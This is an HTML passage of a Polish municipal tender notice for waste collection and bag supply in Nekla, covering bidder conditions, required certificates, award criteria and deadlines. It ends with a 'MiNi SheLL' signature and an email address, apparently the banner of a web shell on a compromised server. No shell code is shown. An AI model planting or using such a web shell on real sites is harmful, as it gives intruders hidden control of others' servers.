Szacuje się, że w okresie realizacji zamówienia (18 miesięcy) Wykonawca powinien dysponować 218 166 sztukami (w tym 28 746 szt. - SZKŁO, 146 924 szt. - PAPIER, METAL, PET, OPAKOWANIA oraz 42 496 szt. - BIODEGRADOWALNE). Worki na odpady zbierane selektywnie dostarczane będą tylko do zabudowy jednorodzinnej, gdzie mieszkańcy zadeklarowali, iż będą segregować odpady komunalne. Dodatkowo Wykonawca dostarczy po 100 sztuk w roku 2017 (do 31 stycznia 2017 r.) oraz po 50 sztuk w roku 2018 (do 31 stycznia 2018 r.) z każdego rodzaju worków do siedziby Urzędu Miasta i Gminy Nekla..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.50.00.00-2, 90.51.10.00-2, 90.41.20.00-9, 90.51.31.00-7, 18.93.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Wykonawca przedstawi: 
a.aktualny wpis do rejestru działalności regulowanej prowadzonego przez Burmistrza Miasta i Gminy Nekla w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, zgodnie z art. 9c ust. 1 ustawy o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz.U.2016.250),
b.aktualne zezwolenie Starosty na prowadzenie działalności w zakresie zbierania odpadów zgodnie z art. 41 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U.2013.21 z późn. zm.). 
Ocena spełnienia powyższych warunków udziału w postępowaniu będzie polegać na sprawdzeniu kompletności i zgodności złożonych dokumentów i oświadczeń według zasady spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik 1 do siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych zamawiający zakazuje istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Jednocześnie dopuszcza możliwość zmiany umowy w następujących przypadkach:
a.	możliwości dokonania zmiany Podwykonawców, w zakresie prac wskazanych w ofercie, w związku z rażącym naruszeniem przez nich warunków umowy oraz w związku ze zdarzeniami losowymi,
b.	zmiany w zakresie płatności - wynagrodzenia w przypadku ustawowej zmiany obowiązującej stawki VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://nekla.nowoczesnagmina.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Nekli 
ul. Dworcowa 10
62-330 Nekla.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2016 godzina 09:00, miejsce: Urząd Miasta i Gminy w Nekli - Sekretariat
ul. Dworcowa 10
62-330 Nekla.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com